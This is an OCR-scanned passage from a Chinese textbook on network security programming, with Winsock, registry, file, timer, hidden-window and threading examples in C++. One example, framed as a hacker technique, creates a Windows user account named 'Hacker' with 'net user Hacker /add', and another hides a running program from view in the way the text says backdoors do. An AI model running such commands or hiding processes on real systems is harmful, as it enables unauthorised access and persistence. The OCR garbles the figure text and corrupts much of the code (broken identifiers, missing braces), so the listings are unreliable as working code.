Shell 和 C Shell, 它 们 彼此 不 兼容 。Shell 语言 的 功能 非常 强大 ,有 时 候 用 它 可 以 轻易 实现 
多 种 复杂 的 功能 。 

3. 其 他 编程 语言 

除了 C/C++, 有 时 候 也 使 用 其 他 的 语言 进行 网 络 安全 编程 ,例如 汇编 语言 Java 语言 、 
C# 语 言 .Perl 语言 等 ,用 户 可 以 根据 实际 需要 来 选择 。 
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3.4.3 网 络 编程 


1. 套 接 字 编程 
套 接 字 (Socket) 是 用 来 实现 主机 和 主机 通信 的 一 个 接口 。 通 过 它 可 以 完成 主机 间 的 通 


信 操 作 , 它 屏蔽 了 底层 的 协议 ,让 用 户 能 够 实现 各 种 类 型 | ee 

的 通信 操作 。 它 的 出 现 ,为 网 络 应 用 程序 的 编写 提供 了 1 1 

极 大 的 方便 。 它 是 网 络 通信 中 应 用 程序 对 应 的 进程 和 网 [ioced] [Bisocked 

络 协议 之 间 的 接口 。 套 接 字 的 位 置 如 图 3-17 所 示 。 1 Ff 
20 世纪 80 年 代 初 ,美国 政府 的 高 级 研究 工程 机 构 “| 网 络 协议 网 络 协议 

(ARPA) 给 加 利 福 尼 亚 大 学 Berkeley 分 校 提供 了 资金 ， 1 + 1 + 

让 他 们 在 UNIX 操作 系统 下 实现 TCP/IP。 在 这 个 项 目 网 络 


中 ,研究 人 员 为 TCP/IP 网 络 通信 开发 了 一 个 API( 应 用 
程序 接口 )。 这 个 API 称 为 Socket 接口 ( 套 接 字 )。 今 
天 ,Socket 接口 已 成 为 TCP/IP 网 络 中 最 为 通用 的 API, 也 是 在 Internet 上 进行 应 用 开发 最 
为 通用 的 API。 

应 用 层 通过 传输 层 进行 数据 通信 时 ,TCP 和 UDP 会 遇 到 同时 为 多 个 应 用 程序 进程 提 
供 并 发 服务 的 问题 。 多 个 TCP 连接 或 多 个 应 用 程序 进程 可 能 需要 通过 同一 个 TCP 端口 传 
输 数 据 。 为 了 区 别 不 同 的 应 用 程序 进程 和 连接 ,许多 计算 机 操作 系统 为 应 用 程序 与 TCP/ 
IP 交互 提供 了 称 为 套 接 字 (Socket) 的 接口 ,区 分 不 同 应 用 程序 进程 间 的 网 络 通信 和 连接 。 
套 接 字 位 于 协议 之 上 ,屏蔽 了 不 同 网 络 协议 之 间 的 差异 。 

生成 套 接 字 ,主要 有 三 个 参数 : 通信 的 目的 IP 地址、 使 用 的 传输 层 协 议 (TCP 或 UDP) 
和 使 用 的 端口 号 。Socket 原意 是 “插座 ”。 通 过 将 这 三 个 参数 结合 起 来 ,与 一 个 “插座 ” 
Socket 绑 定 ,应 用 层 就 可 以 和 传输 层 通 过 套 接 字 接 口 , 区 分 来 自 不 同 应 用 程序 进程 或 网 络 
连接 的 通信 ,实现 数据 传输 的 并 发 服务 。Socket 可 以 看 成 是 两 个 程序 进行 通信 连接 中 的 一 
个 端点 ,一 个 程序 将 一 段 信息 写 和 人 Socket 中 ,该 Socket 将 这 段 信息 发 送 给 另外 一 个 Socket 
中 ,使 这 段 信息 能 传送 到 其 他 程序 中 。 

套 接 字 基 本 上 有 三 种 类 型 ,分 别 是 数据 流 套 接 字 (Stream Socket) 数据 报 套 接 字 
(Datagram Socket) 和 原始 套 接 字 (Raw Socket) 。 

1) 数据 流 套 接 字 

流 套 接 字 用 于 提供 面向 连接 、 可 靠 的 数据 传输 服务 。 该 服务 将 保证 数据 能 够 实现 无 差 
错 、 无 重复 发 送 ,并 按 顺 序 接收 。 流 套 接 字 之 所 以 能 够 实现 可 靠 的 数据 服务 ,原因 在 于 其 使 
用 了 传输 控制 协议 , 即 TCP(Transmission Control Protocol) 。 

2) 数据 报 套 接 字 

数据 报 套 接 字 提供 了 一 种 无 连接 的 服务 。 该 服务 并 不 能 保证 数据 传输 的 可 靠 性 ,数据 
有 可 能 在 传输 过 程 中 丢失 或 出 现 数 据 重复 , 且 无 法 保证 顺序 地 接收 到 数据 。 数 据 报 套 接 字 
使 用 UDP(User Datagram Protocol) 进行 数据 的 传输 。 由 于 数据 报 套 接 字 不 能 保证 数据 传 
输 的 可 靠 性 ,对 于 有 可 能 出 现 的 数据 丢失 情况 ,需要 在 程序 中 做 相应 的 处 理 。 数 据 报 套 接 字 
传输 效率 比较 高 。 


图 3-17 套 接 字 的 位 置 
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3) 原始 套 接 字 

原始 套 接 字 与 标准 套 接 字 (标准 套 接 字 指 的 是 前 面 介 绍 的 流 套 接 字 和 数据 报 套 接 字 ) 的 
区 别 在 于 : 原始 套 接 字 可 以 读 写 内 核 没 有 处 理 的 IP 数据 ,而 流 套 接 字 只 能 读 取 TCP 的 数 
据 , 数 据 报 套 接 字 只 能 读 取 UDP 的 数据 。 因 此 ,如 果 要 访问 其 他 协议 发 送 的 数据 必须 使 用 
原始 套 接 字 。Raw Socket 的 作用 主要 体现 在 以 下 三 个 方面 。 

(1) 通过 Raw Socket 来 接收 和 发 送 ICMP 包 。 

(2) 接收 发 向 本 机 的 但 TCP/IP 栈 不 能 够 处 理 的 IP 包 。 

(3) 用 来 发 送 一 些 自己 指定 源 地 址 的 具有 特殊 作用 的 IP 包 。 

在 网 络 编程 中 最 常用 的 方案 便 是 客户 -服务 器 模型 。 在 这 种 方案 中 ,客户 应 用 程序 向 服 
务 器 程序 请 求 服务 。 一 个 服务 程序 通常 在 一 个 众所周知 的 地 址 监听 对 服务 的 请 求 , 也 就 是 
说 ,服务 进程 一 直 处 于 休眠 状态 ,直到 一 个 客户 对 这 个 服务 的 地 址 提出 了 连接 请 求 。 在 这 个 
时 刻 ,服务 程序 被 “唤醒 ?并 且 为 客户 提供 服务 一 一 对 客户 的 请 求 做 出 适当 的 反应 。 虽 然 基 
于 连接 协议 ( 流 套 接 字 ) 的 服务 是 设计 客户 -服务 器 应 用 程序 时 的 标准 ,但 有 些 服务 也 是 可 以 
通过 无 连接 协议 (数据 报 套 接 字 ) 提 供 。 总 地 来 说 ,使 用 Socket 接口 (面向 连接 或 无 连接 ) 进 
行 网 络 通信 时 ,必须 按 下 面 的 4 个 步骤 进行 处 理 。 

(1) 程序 必须 建立 一 个 Socket。 

(2) 程序 必须 按 要 求 配置 此 Socket。 也 就 是 说 ,程序 要 么 将 此 Socket 连接 到 远方 的 主 
机 上 ,要 么 给 此 Socket 指定 一 个 协议 端口 。 

(3) 程序 必须 按 要 求 通过 此 Socket 发 送 和 接收 数据 。 

(4) 程序 必须 关闭 此 Socket。 

2. Winsock 编程 

20 世纪 90 年 代 初 ,由 Microsoft 联合 了 其 他 几 家 公司 共同 制定 了 一 套 Windows 下 的 
网 络 编程 接口 , 即 Windows Sockets 规范 。 它 是 Berkeley Sockets 的 重要 扩充 ,主要 是 增加 
了 一 些 异 步 函 数 , 并 增加 了 符合 Windows 消息 驱动 特性 的 网 络 事件 异步 选择 机 制 。 
Windows Sockets 规范 是 一 套 开放 的 支持 多 种 协议 的 Windows 下 的 网 络 编程 接口 。 从 
1991 年 的 1. 0 版 到 1995 年 的 2.0 版 ,经 过 不 断 完 善 并 在 Intel、 Microsoft、 Sun、SGI、 
Informix、Novell 等 公司 的 全 力 支 持 下 ,已 成 为 Windows 网 络 编程 的 事实 上 的 标准 。 目 前 ， 
在 实际 应 用 中 的 Windows Sockets 规范 主要 有 1.1 版 和 2.0 版 。 两 者 的 最 重要 区 别 是 1.1 
版 只 支持 TCP/IP ,而 2.0 版 可 以 支持 多 协议 。2. 0 版 有 良好 的 向 后 兼容 性 ,任何 使 用 1.1 
版 的 源 代 码 、 二 进 制 文件 ,应 用 程序 都 可 以 不 加 修改 地 在 2. 0 规范 下 使 用 。Socket 实际 在 
计算 机 中 提供 了 一 个 通信 端口 ,可 以 通过 这 个 端口 与 任何 一 个 具有 Socket 接口 的 计算 机 通 
信 。 应 用 程序 在 网 络 上 传输 ,接收 的 信息 都 通过 这 个 Socket 接口 来 实现 的 。 在 应 用 开发 中 
就 像 使 用 文件 句柄 一 样 ,可 以 对 Socket 句柄 进行 读 、 写 操作 。Windows Sockets 2 是 由 
Windows Sockets 1. 1 发 展 而 来 的 , 它 主要 是 适应 现代 网 络 技 术 的 迅猛 发 展 ,特别 是 多 媒体 
网 络 技 术 的 发 展 需 要 ,通过 制订 Windows Sockets 2 规范 来 提供 一 个 与 协议 无 关 的 网 络 传 
输 接 口 。Windows Sockets 2 实际 是 Windows Sockets 1. 1 接口 的 一 个 超 集 , 它 在 保持 和 
Windows Sockets 1. 1 完全 向 后 兼容 能 力 的 同时 ,扩展 了 Windows Sockets 接口 。 在 使 用 
Winsock 编写 程序 的 时 候 , 要 用 到 几 个 重要 文件 ,分 别 是 头 文件 winsock2. h、 静 态 链接 库 文 
件 ws2_32. lib, 以 及 动态 链接 库 文件 ws2_32. dll。 头 文件 winsock2. h 是 用 在 源 程序 中 的 ,静态 
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链接 库 文 件 ws2_32. lib 是 用 来 编译 基于 Winsock 的 程序 的 ,而 动态 链接 库 文 件 ws2_32. dll 是 
运行 Winsock 的 程序 所 必需 的 。 


3.4.4 网 络 安全 编程 基础 


1. Socket 编程 


网 络 安全 编程 离 不 开 网 络 编程 ,凡是 基于 网 络 应 用 的 程序 都 离 不 开 Socket。 使 用 
Winsock 提供 的 API 函数 是 最 基本 的 网 络 编程 技术 ,如 下 的 程序 proj2. cpp 利用 Socket 获 
得 本 机 的 IP 地 址 和 机 器 名 。 首 先 注意 ,这 段 程序 使 用 的 主 函数 是 main(), 所 以 程序 使 用 
Win32 Console Application 框架 。 在 已 经 建立 好 的 工程 中 ,添加 Win32 Console Application 程 
序 , 输 入 程序 代码 后 ,编译 一 执行 ,程序 报错 ,提示 如 图 3-18 所 示 。 

proj2. cpp 


#include < winsock.h> 

#include < stdio.h> 

void CheckIP(void) //"CheckIP 函数 ", 用 于 获取 本 机 IP 地 址 

{ 
WORD wVersionRequested; //WORD 类 型 变量 ,用 于 存放 Winsock 版 本 的 值 
WSADATA wsaData; 


char name[ 255]; // 用 于 存放 主机 名 
PHOSTENT hostinfo; 
wVersionRequested = MAKEWORD( 2, 0 ); 
// 调 用 MAKEWORD( ) 函数 获得 Winsock 的 版 本 ,用 于 加 载 Winsock 库 
if ( WSAStartup( wVersionRequested, &wsaData ) == 0 ) 
{ 
// 加 载 Winsock 库 , 如 果 WSAStartup( ) 函数 的 返回 值 为 0, 说 明 加 载 成 功 
if( gethostname ( name, sizeof(name)) == 0) 
{ 
// 判 断 是 否 成 功 地 将 本 地 主机 名 存放 人 由 name 参数 指定 的 缓冲 区 中 
if((hostinfo = gethostbyname(name)) != NULL) 


{ 
// 如 果 获 得 主机 名 成 功 ,调用 inet_ntoa( ) 函 数 取 得 IP 地 址 
LPCSTR ip = inet ntoa (* (struct in addr * ) * hostinfo—->h addr list); 
printf(" 本 机 的 IP 地址 是 : % s\n", ip); // 输 出 本 机 IP 地 址 
printf(" 本 机 的 名 称 是 : % s\n", name); // 输 出 本 机 名 称 
} 
} 
WSACleanup( ); // 印 载 Winsock 库 , 并 释放 所 有 资源 


int main() 

{ 
CheckIP() // 调 用 CheckIP( ) 函数 获得 并 输出 IP 地 址 
return 0; 


} 


出 现 这 种 错误 提示 ,说 明 Socket 库 没有 被 加 载 到 工程 中 ,需要 更 改 工程 设置 ,在 工作 窗 
口中 ,选择 菜单 栏 中 的 “工程 ?一 单 击 “ 设 置 ”出 现 如 图 3-19 所 示 的 界面 ,选择 Link 选项 卡 ， 
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并 在 2 所 指 的 地 方 , 在 最 后 面 输入 "ws2_32. lib”, 用 空格 和 前 面 的 库 隔 开 ， 因为 Socket 相关 
的 函数 都 定义 在 ws2_32. lib 库 中 ,必须 加 载 该 库 。 添 加 之 后 ,再 次 编译 运行 ,执行 的 结果 


* test - 创 天 中 文 YC++ 

文件 编辑 查看 插入 工程 编译 工具 窗口 帮助 
前 | 芝 回 鲜 | 交 区 和 岛 | 位- 二 -后 | 遍 车 | 芭 可 
[SORT Cr 


EN & test.cpp 
Hinclude 《winsock-h> 


艰 男 本 1 加 提 


ece Meat test': 1 prc ey 
白 稳 testfiles include <stdio.h> 
Source Files 
因 testcpp void CheckIP(uoid) /VCheckIP 函 数 ， 用 于 获取 本 机 IP 地 址 


Header Files 
Resource Files 
9 External Depend 


€ 
WORD wuersionRequested;//VORD 米 型 变量 ， 用 于 存放 winsock 版 本 的 全 
WSADATA vsaData; 


char name[255];// 用 于 存放 主 贡 名 

PHOSTENT hostinfo; 

wersionRequested = MAKEWORD( 2, 0 ); 

7/ 调用 MAKEWORD() 函 数 获 得 典 nsock 的 版 本 ， 用 于 加 载 类 nsock 库 
if ( WSAStartup( wersionRequested, &wsaData ) == 9 ) 


/1 加 载 Winsock 库 ， 加 果 WSaStartup() 函 数 的 返回 值 鸭 9， 说 明 加 到 
if( gethostnane ( nane, sizeof(nane)) == 9) 
’ 


LNK2881: unresolved external synbol _WSACleanup@@ 
LNK2881: unresolved external synbol inet ntoa@y 
LNK2881: unresolued external synbol _gethostbyname@ 
LNK2881: unresolved external synbol _gethostnane@8 

: error LNK2881: unresolved external synbol _WSAStartup@8 
Debug/test.exe : fatal error LNK1129: 5 unresolved externals 

Error executing link.exe. 


test-exe - 6 error(s), 9 warning(s) 


N 输 出 文件 名 : 
Debughest.exe 


上 对 象 | 库 模块 : 
[kermel32TD user32.lib gdi32.lib winspool.lib cpmatg32lib 
F G 产 生 | 库 

F 1 增加 链接 厂 MM 产生 地 图 文件 

厂 E 允许 配置 文件 

Project Options: 

kernel32.lib user32.lib gdi32.lib winspool.lib 


comdlg32.lib advapi32.lib shell32.lib ole32.lib 
oleaut32.lib uuid.lib odbc32.lib odbccp32.lib 司 


己 要 并 


图 3-19 添加 ws2_32. 1ib 函数 库 


DS 


如 图 3-20 所 示 。 
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5 "C:\Program Files\Microsoft Yisual Studio\MyProjects\l 
际 科 入 轩 址 是 ，219 -246 .5.289 

| 本 机 的 名 称 是 ，13@7-1 

Press any key to continue 


图 3-20 ”proj2. cpp 程序 运行 结果 


2. 注册 表 编 程 
注册 表 在 计算 机 中 由 键 名 和 键 值 组 成 ,注册 表 中 存储 了 Window 操作 系统 的 所 有 配置 。 


黑客 90% 以 上 对 Windows 的 攻击 手段 都 离 不 开 读 写 注册 表 。 在 “运行 "对话 框 中 输入 
“regedit” 命 令 可 以 进入 注册 表 。 注 册 表 的 句柄 可 以 由 调用 RegOpenKeyEx ( ) 和 
RegCreateKeyEx() 卫 数 得 到 。 通 过 函数 RegQueryValueEx() ,可 以 查询 到 注册 表 中 某 一 
项 的 值 ; 通过 函数 RegSetValueEx() ,可 以 设置 注册 表 某 一 项 的 值 。RegCloseKey() 函 数 执 
行 关闭 键 值 。 下 面 是 proj3. cpp 的 源 代码 。 


proj3. cpp 


#include < windows.h> 
#include < stdio.h> 
void main( ) 
{ 
HKEY hkey; 
char Author[100] = "LiuWenTao"; 
char Organization[100] = "Internet"; 
char City[100] = "WuHan"; 
bool State = true; 
unsigned char KeyBuffer[ 50]; 
DWORD Type = 0; 
DWORD DataLen = 1024; 
memset (KeyBuffer, 0, sizeof(KeyBuffer)); // 打 开 键 
if (RegOpenKeyEx(HKEY CURRENT USER, "Software\\A New Program\\Information", 0, KEY_ALL_ 
ACCESS，&hkey) != ERROR_SUCCESS) // 此 函数 用 来 打开 键 的 方法 , "HKEY_CURRENT_USER" 表 示 已 经 
// 打 开 的 键 的 句柄 , "Software\\A New Program\\Information" 表 示 要 打开 的 子 键 的 名 称 , 第 三 个 参 
// 数 保留 , 设 为 0, "KEY_ALL_ACCESS" 表 示 打 开 的 方式 ,返回 打开 的 子 键 的 句柄 
{// 如 果 打开 失败 就 创建 键 
if(RegCreateKey(HKEY_CURRENT_USER, "Software\\ANewProgram\\Information", &hkey) != 
ERROR_SUCCESS) // 由 此 函数 创建 注册 表 中 的 新 键 "A New Program\\Information", 要 打开 的 键 的 句柄 
// 是 HKEY_CURRENT_USER 
t printf("RegCreateKey failed with Erro \n"); 
return ; 
} 
} 
// 设 置 键 值 
if (RegSetValueEx( hkey, "Organization", 0, REG_ SZ, (BYTE * ) Organization，100) != ERROR_ 
SUCCESS) ”// 此 函数 用 来 设置 键 值 , "hkey" 表 示 要 设置 的 键 的 句柄 , "0rganization" 表 示 要 访问 的 键 
// 值 的 名 称 , "0" 是 保留 值 ,REG_Sz 表示 要 设置 的 数据 类 型 ,Organization 表示 要 设置 的 键 值 , "100" 
// 表 示 数 据 的 长 度 
{ 
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printf("RegSetValueEx failed with Erro \n"); 
return ; 
» 
证 (RegSetValueEx(hkey, "Author", 0, REG SZ, (BYTE* )Author, 100) != ERROR SUCCESS) 
{ 
printf("RegSetValueFx failed with Erro \n"); 
return ; 
} 
if (RegSetValueEx(hkey, "City", 0, REG SZ, (BYTE* )City, 100) != ERROR SUCCESS) 
{ 
printf("RegSetValueEx failed with Erro \n"); 
return ; 
: 
if (RegSetValueEx(hkey, "State", 0, REG DWORD, (BYTE* ) &State, 4) != ERROR_SUCCESS) 
{ 
printf("RegSetValueEx failed with Erro \n"); 
IFeturn /7 
if (RegCloseKey(hkey) != ERROR_SUCCESS)// 表 示 要 关闭 的 键 值 , "hkey" 表 示 要 关闭 的 键 的 句柄 
{ 
printf("RegCloseKey failed with Erro \n"); 
return ; 
}// 打 开 键 
if (RegOpenKeyEx(HKEY CURRENT USER, "Software\\A New Program\\Information", 0, KEY_ALD_ 
ACCESS, &hkey) == ERROR_SUCCESS) 
{ 
if(RegQueryValueEx(hkey, "Author", 0, &Type, KeyBuffer, gDataLen) == ERROR_SUCCESS) 
// 此 函数 是 用 来 获取 键 值 的 , "hkey" 表 示 要 查询 的 句柄 , "Author" 表 示 要 查询 键 值 的 名 字 , "0" 保 留 值 ， 
//"&Type" 是 数据 缓存 地 址 , "gDataLen" 是 数据 缓存 区 的 大 小 
{ 
printf("Author: % s\n", KeyBuffer); 
} 
else 
{ 
printf("RegQueryValueEx failed with Erro \n"); 
return ; 
} 
if (RegQueryValueEx(hkey, "Organization", 0, &Type, KeyBuffer, &DataLen) == ERROR_ 
SUCCESS) 
{ 
printf("Organization: % s\n", KeyBuffer); 
} 
else 
{ 
printf("RegQueryValueEx failed with Erro \n"); 
return; 
} 
if (RegQueryValueEx(hkey, "City", 0, &Type, KeyBuffer, gDataLen) == ERROR SUCCESS) 
{ 
printf("City: % s\n", KeyBuffer); 
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else 
{ 
printf("RegQueryValueEx failed with Erro \n"); 
return ; 
} 
if (RegQueryValueEx(hkey, "State", 0, &Type, KeyBuffer, &DataLen) == ERROR SUCCESS) 
{ 
State = KeyBuffer[0]; 
if (State) 
{ 
printf("State:true\n"); 


} 


else 


{ 
printf("State:false\n"); 


} 
} 


else 

{ 
printf("RegQueryValueEx failed with Erro \n"); 
return; 

}// 关 闭 键 句柄 

if (RegCloseKey(hkey) != ERROR_SUCCESS) 

{ 
printf("RegCloseKey failed with Erro \n"); 
return ; 


} 


else 


{ 
printf("RegOpenKeyEx failed with Erro \n"); 
return ; 


} 
程序 最 后 执行 的 结果 如 图 3-21 所 示 。 


Press any key to continue 


图 3-21 ”proj3. cpp 程序 运行 结果 
对 照 修改 过 的 注册 表 , 可 知 程序 执行 成 功 。 修 改 后 的 注册 表 如 图 3-22 所 示 。 
3. 文件 系统 编程 


文件 系统 编程 非常 重要 ,在 DOS 命令 行 下 执行 的 操作 都 可 以 使 用 程序 实现 。 在 DOS 
令 行 下 使 用 命令 “net user Hacker /add” 添 加 一 个 用 户 ,同样 可 以 在 程序 中 实现 ,如 程序 
proj4. cpp 可 以 用 来 实现 添加 用 户 。 
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红 注册 表 给 将 器 
文件 (E) 编辑 (E) 查看 (YW) 收 送 天 (A) 帮助 (H) 
[名称 | 类 型 | 数据 
国 叶 DD rN ，， ) 
加 suhor REG_Sz LuWenTao 
网 ay REG Sz Wuhan 
- 网 oroanization REG 5 Internet ) 
申 国 dkeit3cm EE REG_DWOD Oxcccece0! (3435973635 
田 和 Autodesk We 
四国 baidu Te 
由 国 BasicScript rogram 
由 国 dasses 
由 国 Dell Computer Corpc 
由 国 Design 5dence 
申 国 esET 
由 国 cabes 
由 国 Higraeve Inc 
由 国 IMProviders ”| 
小 S| 
| 栈 的 电脑 \HKEY_CURRENT_U5ER\Software\A New Programinformation 
图 3-22 ”修改 后 的 注册 表 
proj4. cpp 


#include < stdio.h> 
#include < windows.h> 
main() 


{ 


} 


运 


char * szCMD = "net user Hacker /add"; 
BOOL bSuccess; 
PROCESS_INFORMATION piProcInfo; 
STARTUPINFO Info; 
Info. cb = sizeof (STARTUPINFO); 
Info. lpReserved = NULL; 
Info. lpDesktop = NULL; 
Info. lpTitle = NULL; 
Info. cbReserved2 = 0; 
Info. lpReserved2 = NULL; 
bSuccess = CreateProcess( NULL, szCMD, NULL, NULL, false, NULL, NULL, NULL, &Info, &piProcInfo); 
if(!bSuccess) 
printf(" 创 建 进程 失败 !"); 


return 1; 


行 结果 通过 在 DOS 下 用 命令 “net user" 来 查看 用 户 是 否 添 加 成 功 ,结果 如 图 3-23 所 示 。 


FR CNWINDOWSN\system32\cmd.ene 


icrosoft Windows XP [上 本 5.1.2688] 
kc》 版 权 所 有 1985-28@1 Microsoft Corp- 


:Docunents and Settings\Adninistratormet user 


Adninistrator Hacker 

le lphssistant SUPPORT_388945ag UUSNX-1397-1 
人 a 

命令 成 功 完 


: Documents and Settings\Adninistrator> 


3-23 ”proj4. cpp 程序 运行 结果 
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在 程序 中 也 可 以 利用 C 库 函 数 实现 文件 的 拷贝 等 操作 ,使 用 起 来 非常 方便 ,proj5. cpp 
源 程序 如 下 。 
proj5. cpp 


#include < stdio.h> 

#include < windows. h> 

main() 

{ 
CopyFile("C:\\Filel. txt", "C:\\File2. txt", TRUE); 
MoveFile("C:\\Filel. txt", "C:\\File3. txt"); 
return 1; 


} 


通过 程序 的 执行 ,原来 在 C 盘 下 的 \Filel. txt 被 覆盖 ,只 剩 下 File2. txt 和 File3. txt 文 
件 。 函 数 CopyFile 的 第 三 个 参数 TRUE 表示 如 果 目 标 文件 存在 就 覆盖 ,如 果 该 参数 是 
FALSE, 则 不 覆盖 。 

4. 定时 器 编程 

著名 的 “CIH 病毒 ”每 年 定时 发 作 , 其 中 就 需要 利用 定时 器 来 控制 程序 的 执行 。 定 时 器 
程序 分 成 两 大 类 : 一 类 是 循环 执行 , 另 一 类 是 根据 条 件 只 执行 一 次 。 在 程序 中 加 载 定 时 器 ， 
如 程序 proj6. cpp 所 示 。 

proj6. cpp 


#define _WIN32_WINNT 0x0500 
#include < stdio.h> 
#include < conio.h> 
#include < windows.h> 
void main( ) 
{ 
HANDLE Timer = NULL; 
LARGE_INTEGER liDueTime; 
liDueTime.QuadPart =  —- 10000000; 
int KeyInfo; 
while (1) 
{ 
Timer = CreateWaitableTimer(NULL，TRUE，"NewTimer");// 此 函数 用 来 创建 定时 器 ,参数 
//"NULL" 表 示 定 时 器 的 属性 , "TRUE" 表 示 是 否 手动 复位 , "NewTimer" 表 示 定 时 器 的 名 称 
if (Timer == NULL) 
{ 
printf("CreateWaitableTimer with error % d\n", GetLastError()); 
return ; 
} 
证 (!SetWaitableTimer(Timer，&lLiDueTime，0，NULL，NULL，0)) // 此 函数 用 来 设置 定时 
// 器 , "Timer" 表 示 定 时 器 句柄 , "&liDueTime" 表 示 时 间 间 隔 ,如 果 是 正 值 是 绝对 时 间 , 如 果 是 负 值 是 
// 相 对 时 间 , 第 三 个 参数 表示 周期 ,第 四 个 参数 表示 回调 函数 ,第 五 个 表示 传递 给 回调 函数 的 参数 ， 
// 最 后 一 个 参数 表示 是 否 自动 恢复 
{ 


printf("SetWaitableTimer with error % d\n", GetLastError()); 
CloseHandle( Timer); 
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Teturn ; 
} 
if (WaitForSingleObject(Timer, INFINITE) != WAIT OBJECT 0) 
{ 
printf("WaitForSingleObject with error % d\n", GetLastError()); 
CloseHandle(Timer); 
return ; 


} 
else 
static int number = 0; 
mumber++ 7 
printf("% d\n", number); 
t 
CloseHandle( Timer); 
} 
return ; 


} // 此 程序 的 功能 是 每 隔 1 秒 钟 就 输出 一 个 数 ,数字 在 不 断 增加 


5. 驻 留 程序 

程序 在 执行 时 ,都 会 显示 出 窗口 ,一般 后 门 或 者 病毒 程序 都 是 后 台 和 运行 的 。 其 实 可 
以 方便 地 编写 驻 留 程序 。 在 程序 proj7. cpp 中 ,只 要 将 ShowWindows() 函 数 中 的 SW_ 
SHOWMAXINIZED 参数 改 成 SW_HIDE 即 可 。 

proj7. cpp( 文 件 名 为 b. cpp) 


#include < windows.h> 
WNDCLASS wc; 
HWND h_wnd; 
MSG msg; ”/* 消息 处 理 函 数 wndProc 的 声明 * / 
long WINAPI WindowProc(HWND, UINT, WPARAM, LPARAM) ; / * winMain 函数 的 声明 * / 
int PASCAL WinMain(HINSTANCE h_CurInstance, HINSTANCE h_PrevInstance, LPSTR p_CmdLine, int m_ 
Show) 
{ 
/* 初始 化 wndclass 结构 变量 * / 
we. lpfnWndProc = WindowProc; 
wc. hInstance = h CurInstance; 
wc. hbrBackground = (HBRUSH)GetStockObject(WHITE BRUSH); 
wc. lpszClassName = "TheMainClass"; 
/* 注册 Wndclass 结构 变量 * / 
RegisterClass( &wc); 
/* 创建 窗口 * / 
h_wnd = CreateWindow("TheMainClass", "Our first Window", 
WS_OVERLAPPEDWINDOW, 0, 0, 400, 500, 0,0,h_CurInstance, 0); 
/x* 显示 窗口 */ 
ShowWindow(h_wnd, SW_HIDE) ; 
/* 消息 循环 */ 
while(GetMessagel( gmsg, NULL, 0, 0)) 
DispatchMessage( &msg); 
return (msg. wParam ); 
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} 

Hdefine ID_TIMER 1 

/* 定义 消息 处 理 函 数 * / 

long WINAPI WindowProc(HNND h_wnd,UINT WinMsg, WPARAM w_param, LPARAM 1 param) 
static BOOL fFlipFlop = FALSE ; 


HBRUSH hBrush ; 
HDC hdc ; 
PAINTSTRUCT ps ; 
RECT res 


switch (WinMsg) 

{ 

Case WM_CREATE: 
SetTimer (h_wnd, ID_TIMER, 1000, NULL) ; 
return0; 

case WM_TIMER : 
MessageBeep (—1); 
fFlipFlop = !fFlipFlop; 
InvalidateRect (h_wnd, NULL, FALSE) ; 
return0; 

Case WM_PAINT : 
hdc = BeginPaint (h wnd, &ps) ; 
GetClientRect (h_wnd，&rc) ; 
hBrush = CreateSolidBrush (fFlipFlop ? RGB(255,0,0) : RGB(0,0,255)) ; 
FillRect (hdc，&rc，hBrush) ; 
EndPaint (h_wnd, &ps) ; 
DeleteObject (hBrush) ; 
return0; 

case WM_DESTROY : 
KillTimer (h_wnd, ID_TIMER) ; 
PostQuitMessage (0) ; 
return0; 

} 

return DefWindowProc(h_wnd, WinMsg, w_param, 1]_param) ; 

1 


编译 执行 程序 之 后 ,程序 并 没有 任何 的 显示 ,打开 “Windows 任务 管理 器 ”, 查 看 “进程 ” 
选项 卡 ,可 以 看 到 在 后 台 执 行 的 b. exe 程序 ,如 图 3-24 所 示 。 


互 windows 任务 管理 回 
文 性 虽 ， 选 项 CO) 查看 V) 关机 (u) 才 助 4 


应 用 程序 进程 | 性 能 | 联网 | 用 户 | 


Adninistrator 
Adninistrator 
Adninistrator 
Adn 


proj7.cpp 的 执 
行程 序 是 b.exe 


Es 


conime. exe Adninistrator 
TXPlatforn. exe = Adninistrator 
svehost_ exe SYSTEN 


Eni exe Adninistrator 
MM. EXE SYSTEN 


图 3-24 ”proj7. cpp 运行 结果 
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6. 多 线程 编程 

用 多 线程 技术 编程 有 以 下 两 大 优点 。 

(1) 提高 CPU 的 利用 率 。 由 于 多 线程 并 发 运行 ,用 户 在 做 一 件 事情 的 时 候 还 可 以 做 另 
外 一 件 事 。 特 别 是 在 多 个 CPU 的 情况 下 ,更 可 以 充分 地 利用 硬件 资源 的 优势 ,将 一 个 大 任 
务 分 成 几 个 任务 ,由 不 同 的 CPU 来 合作 完成 。 

(2) 采用 多 线程 技术 ,可 以 设置 每 个 线程 的 优先 级 ,调整 工作 的 进度 。 

在 实际 开发 过 程 中 ,一 定 要 有 一 个 主 进程 ,其 他 线程 可 以 共享 该 进程 也 可 以 独立 运行 ， 
每 个 线程 占用 CPU 的 时 间 有 限制 ,可 以 设置 运行 优先 级 别 。 

线程 独立 运行 的 编程 方法 如 程序 proj8. cpp 所 示 。 

proj8. cpp 


#include < process. h> 

#include < stdlib.h> 

#include < stdio. h> 

int addem( int); 

int main( int argc，char * argv[]) 

{ 
_beginthread( (void ( * )(void * ))addem, 0, (void * )10); 
_beginthread( (void ( * )(void * ))addem, 0, (void * )11); 
addem(12); 
return 0; 


J 


int addem( int count) 
{ 
int i; 
long sum; 
sum = 0; 
for (i=0; i<=count; ++i) { 
printf("The value of %d is %d\n", count, i); 
Sum += i; 
} 
printf("The sum is % d\n", sum); 
return 0; 


} 
程序 中 三 个 线程 同时 执行 连 加 的 操作 ,直接 编译 程序 ,出 现 错误 ,提示 说 明 : 


C:\ProgramFiles\MicrosoftVisualStudio\MyProjects\test. cpp(8) :error 

c2065: 'beginthread':Undeclared identifier Error executing 
因为 基于 控制 台 的 应 用 程序 ,默认 是 单线 程 的 执行 方式 ,需要 修改 工程 配置 信息 。 在 程序 运行 
界面 中 ,选择 菜单 栏 * 工 程 " 下 的 “设置 "选项 ,之 后 在 对 话 框 中 选择 C/C++” 选项 卡 , 如 图 3-25 
所 示 。 

在 图 3-25 中 ,选择 1 所 指 的 “分 类 ”下 拉 列 表 中 的 Code Generation 选项 ,然后 将 2 所 指 
的 Use run-time liberary 项 值 改 为 Debug Multithreaded, 如 图 3-26 所 示 。 

重新 选择 好 后 ,再 次 编译 ,执行 程序 ,三 个 线程 分 别 算出 了 1 一 10 所 有 整数 的 和 、1 一 11 
所 有 整数 的 和 以 及 1 一 12 所 有 整数 的 和 ,结果 如 图 3-27 所 示 。 
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Processor 
[Biena* 


Calling convention: 
|_cdecl* 

